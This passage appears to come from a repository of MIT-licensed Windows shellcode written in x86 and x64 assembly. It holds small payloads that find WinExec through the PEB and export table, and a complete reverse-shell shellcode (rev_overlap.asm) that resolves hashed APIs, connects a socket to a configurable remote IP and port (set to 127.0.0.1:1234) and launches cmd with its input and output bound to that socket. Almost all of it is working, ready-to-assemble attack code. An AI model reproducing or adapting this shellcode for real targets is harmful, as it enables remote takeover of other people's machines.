; whom the Software is furnished to do so, subject to the following 11 | ; conditions: 12 | ; 13 | ; The above copyright notice and this permission notice shall be included in 14 | ; all copies or substantial portions of the Software. 15 | ; 16 | ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ; ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | ; OTHER DEALINGS IN THE SOFTWARE. 23 | ; 24 | 25 | .386 26 | .model flat 27 | 28 | .code 29 | 30 | assume fs:nothing 31 | code_start: 32 | jmp init_cmd 33 | call_winexec: 34 | ; obtain kernel32.dll base from PEB 35 | push 30h 36 | pop ecx 37 | mov esi, [fs:ecx] 38 | mov esi, [esi+0ch] 39 | mov esi, [esi+0ch] 40 | lodsd 41 | mov esi, [eax] 42 | mov ebp, [esi+18h] 43 | ; get offset of export table 44 | mov eax, [ebp+3ch] 45 | mov eax, [ebp+eax+78h] 46 | lea esi, [ebp+eax+1ch] 47 | ; calculate RVA of exported api 48 | mov cl, 3 49 | load_rva: 50 | lodsd 51 | add eax, ebp 52 | push eax 53 | loop load_rva 54 | ; init search 55 | pop edi 56 | pop esi 57 | pop ebx 58 | ; find WinExec 59 | load_api: 60 | movzx edx, word ptr[edi+2*ecx] 61 | inc ecx 62 | lodsd 63 | cmp dword ptr[ebp+eax], 'EniW' 64 | jne load_api 65 | ; call WinExec 66 | add ebp, [ebx+4*edx] 67 | call ebp 68 | ret 69 | init_cmd: 70 | ; initialize command parameters 71 | push eax ; doesn't matter.. 72 | call call_winexec 73 | cmd_line: 74 | ;db 'cmd /c echo Hello, World! >test.txt && notepad test.txt', 00h 75 | 76 | end 77 | -------------------------------------------------------------------------------- /win32/rev_overlap.asm: -------------------------------------------------------------------------------- 1 | ; 2 | ; The MIT License: 3 | ; 4 | ; Copyright (c) 2008, 2013 Kevin Devine 5 | ; 6 | ; Permission is hereby granted, free of charge, to any person obtaining a 7 | ; copy of this software and associated documentation files (the "Software"), 8 | ; to deal in the Software without restriction, including without limitation 9 | ; the rights to use, copy, modify, merge, publish, distribute, 10 | ; sublicense, and/or sell copies of the Software, and to permit persons to 11 | ; whom the Software is furnished to do so, subject to the following 12 | ; conditions: 13 | ; 14 | ; The above copyright notice and this permission notice shall be included in 15 | ; all copies or substantial portions of the Software. 16 | ; 17 | ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 22 | ; ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 23 | ; OTHER DEALINGS IN THE SOFTWARE. 24 | ; 25 | .686 26 | .model flat, stdcall 27 | 28 | option casemap:none 29 | 30 | .nolist 31 | .nocref 32 | 33 | WIN32_LEAN_AND_MEAN equ 1 34 | 35 | include windows.inc 36 | include winsock.inc 37 | 38 | .list 39 | .cref 40 | 41 | REMOTE_IP equ 00100007Fh ; 127.0.0.1 42 | REMOTE_PORT equ 1234 43 | ROL_CONSTANT equ 7 44 | 45 | mrol macro iNum:req, iBits:req 46 | exitm <((iNum shl iBits) and 0FFFFFFFFh) or (iNum shr (32-iBits))> 47 | endm 48 | 49 | hashapi macro szApi 50 | local dwApi 51 | 52 | dwApi = 0 53 | 54 | forc x, szApi 55 | if '&x' ne '"' 56 | dwApi = mrol((dwApi + '&x'), ROL_CONSTANT) xor '&x' 57 | endif 58 | endm 59 | dwApi = mrol(dwApi, ROL_CONSTANT) 60 | ifdef USE_16 61 | dw (dwApi and 0FFFFh) 62 | else 63 | dd (dwApi and 0FFFFFFFFh) 64 | endif 65 | endm 66 | 67 | PUSHAD_STRUCT struc 68 | _edi dd ? 69 | _esi dd ? 70 | _ebp dd ? 71 | _esp dd ? 72 | _ebx dd ? 73 | _edx dd ? 74 | _ecx dd ? 75 | _eax dd ? 76 | PUSHAD_STRUCT ends 77 | 78 | .data 79 | wsa WSADATA <> 80 | 81 | includelib kernel32.lib 82 | includelib ws2_32.lib 83 | 84 | STACK_SIZE equ sizeof(PROCESS_INFORMATION) \ 85 | + sizeof(STARTUPINFO) \ 86 | + sizeof(sockaddr_in) \ 87 | + 4*4 88 | .code 89 | 90 | entrypoint: 91 | ifdef TEST_CODE 92 | mov eax, code_end - code_start 93 | 94 | push offset wsa 95 | push MAKEWORD(2, 0) 96 | call WSAStartup 97 | 98 | call code_start 99 | 100 | push eax 101 | call ExitProcess 102 | endif 103 | code_start: 104 | jmp load_data 105 | calc_position: 106 | pop esi ; esi has pointer to our hashes 107 | ; load relative address of our API retrieval routine 108 | lea ebp, [esi + (offset get_proc_address - offset data_section)] 109 | 110 | xor eax, eax ; eax = 0 111 | cdq ; edx = 0 112 | mov dl, STACK_SIZE 113 | 114 | sub esp, edx ; first, reserve stack space for api parameters 115 | mov edi, esp ; store stack pointer in edi so we can use stosd instruction 116 | mov ecx, edx ; set size of data to initialize 117 | rep stosb ; zero fill 118 | 119 | push SOCK_STREAM 120 | push AF_INET 121 | call ebp ; WSASocketA 122 | xchg eax, ebx ; save socket 123 | 124 | mov eax, not REMOTE_IP 125 | not eax 126 | push eax 127 | 128 | mov eax, not ((REMOTE_PORT and 0FFh) shl 24) or \ 129 | (((REMOTE_PORT and 0FF00h) shr 8) shl 16) + AF_INET 130 | not eax 131 | push eax 132 | 133 | mov eax, esp ; sockaddr_in 134 | 135 | push sizeof(sockaddr_in) 136 | push eax ; &sin 137 | push ebx ; s 138 | call ebp ; connect 139 | 140 | add esp, sizeof(sockaddr_in)+2*4 ; free stack space 141 | 142 | push ebx ; parameter to closesocket 143 | xchg eax, ebx 144 | 145 | lea ebx, [edi - ( sizeof(PROCESS_INFORMATION) + sizeof(STARTUPINFO) )] 146 | lea edi, [ebx][STARTUPINFO.hStdInput] 147 | inc dword ptr[ebx][STARTUPINFO.dwFlags+1] 148 | 149 | stosd ; si.hStdInput 150 | stosd ; si.hStdOutput 151 | stosd ; si.hStdError 152 | 153 | cdq 154 | push edi ; &pi 155 | push ebx ; &si 156 | 157 | push edx 158 | push edx 159 | push edx 160 | push eax ; TRUE 161 | push edx ; 0 162 | push edx ; 0 163 | inc byte ptr[esi+3] 164 | push esi ; "cmd",0 165 | lodsd ; skip string 166 | push edx ; 0 167 | call ebp ; CreateProcessA 168 | 169 | push INFINITE ; INFINITE 170 | push dword ptr[edi][PROCESS_INFORMATION.hProcess] 171 | call ebp ; WaitForSingleObject 172 | 173 | push dword ptr[edi][PROCESS_INFORMATION.hThread] 174 | call ebp ; CloseHandle 175 | 176 | push dword ptr[edi][PROCESS_INFORMATION.hProcess] 177 | call ebp ; CloseHandle 178 | 179 | call ebp ; closesocket 180 | 181 | add esp, sizeof(PROCESS_INFORMATION) + sizeof(STARTUPINFO) ; free stack space 182 | ret 183 | 184 | load_data: 185 | call calc_position 186 | ; not really data section as we're in same segment 187 | data_section label dword 188 | hashapi "WSASocketA" 189 | hashapi "connect" 190 | db "c", "m", "d", 0FFh 191 | hashapi "CreateProcessA" 192 | hashapi "WaitForSingleObject" 193 | hashapi "CloseHandle" 194 | hashapi "CloseHandle" 195 | hashapi "closesocket" 196 | 197 | get_proc_address proc near 198 | assume fs:nothing 199 | 200 | pushad 201 | push 30h 202 | pop esi 203 | lods dword ptr fs:[esi] 204 | mov eax, [eax+0Ch] 205 | mov esi, [eax+1Ch] 206 | load_dll: 207 | mov ebp, [esi+08h] 208 | lodsd 209 | push eax 210 | 211 | mov eax, [ebp+3Ch] ; IMAGE_DOS_HEADER.e_lfanew 212 | mov eax, [ebp+eax+78h] ; IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress 213 | lea esi, [ebp+eax+18h] ; IMAGE_EXPORT_DIRECTORY.NumberOfNames 214 | lodsd 215 | xchg eax, ecx 216 | jecxz load_dll 217 | 218 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions 219 | add eax, ebp 220 | push eax 221 | 222 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfNames 223 | lea edi, [ebp+eax] 224 | 225 | lodsd ; IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals 226 | lea ebx, [ebp+eax] 227 | load_api: 228 | mov esi, [edi+4*ecx-4] 229 | add esi, ebp 230 | xor eax, eax 231 | cdq 232 | hash_api: 233 | lodsb 234 | add edx, eax 235 | rol edx, ROL_CONSTANT 236 | xor edx, eax 237 | dec eax 238 | jns hash_api 239 | 240 | cmp edx, dword ptr[esp+8][PUSHAD_STRUCT._eax] 241 | 242 | loopne load_api 243 | pop eax 244 | pop esi 245 | jne load_dll 246 | 247 | movzx edx, word ptr [ebx+2*ecx] 248 | add ebp, [eax+4*edx] 249 | mov [esp][PUSHAD_STRUCT._eax], ebp 250 | popad 251 | jmp eax 252 | get_proc_address endp 253 | 254 | code_end label dword 255 | 256 | end entrypoint 257 | -------------------------------------------------------------------------------- /win64/exec.asm: -------------------------------------------------------------------------------- 1 | ; The MIT License: 2 | ; 3 | ; Copyright (c) 2008, 2013 Kevin Devine 4 | ; 5 | ; Permission is hereby granted, free of charge, to any person obtaining a 6 | ; copy of this software and associated documentation files (the "Software"), 7 | ; to deal in the Software without restriction, including without limitation 8 | ; the rights to use, copy, modify, merge, publish, distribute, 9 | ; sublicense, and/or sell copies of the Software, and to permit persons to 10 | ; whom the Software is furnished to do so, subject to the following 11 | ; conditions: 12 | ; 13 | ; The above copyright notice and this permission notice shall be included in 14 | ; all copies or substantial portions of the Software. 15 | ; 16 | ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ; ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | ; OTHER DEALINGS IN THE SOFTWARE. 23 | ; 24 | .x64 25 | .model flat, fastcall 26 | .code 27 | code_start: 28 | sub rsp, 28h 29 | jmp init_cmd 30 | calc_pos: 31 | xor eax, eax 32 | push 60h 33 | pop rcx 34 | mov rsi, [gs:rcx] 35 | mov esi, [rsi+18h] 36 | mov esi, [rsi+10h] ; InLoadOrderModuleList 37 | lodsd ; skip ntdll.dll 38 | mov esi, [rax] ; kernel32.dll 39 | mov edi, [rsi+30h] ; LDR_DATA_TABLE_ENTRY.DllBase 40 | add ecx, dword ptr[rdi+3ch] 41 | mov ebx, dword ptr[rdi+rcx+28h] 42 | 43 | mov esi, dword ptr[rdi+rbx+20h] 44 | add esi, edi 45 | 46 | mov ecx, dword ptr[rdi+rbx+24h] 47 | add ecx, edi 48 | cdq 49 | find_loop: 50 | movzx ebp, word ptr[rcx+2*rdx] 51 | inc edx 52 | lodsd 53 | cmp dword ptr[rdi+rax], 'EniW' 54 | jne find_loop 55 | 56 | mov esi, dword ptr[rdi+rbx+1ch] 57 | add esi, edi 58 | add edi, [rsi+4*rbp] 59 | cdq 60 | pop rcx 61 | call rdi 62 | add rsp, 28h 63 | ret 64 | init_cmd: 65 | call calc_pos 66 | cmd_line: 67 | ;db 'cmd /c echo Hello, World! >test.txt && notepad test.txt', 00h 68 | 69 | end 70 | --------------------------------------------------------------------------------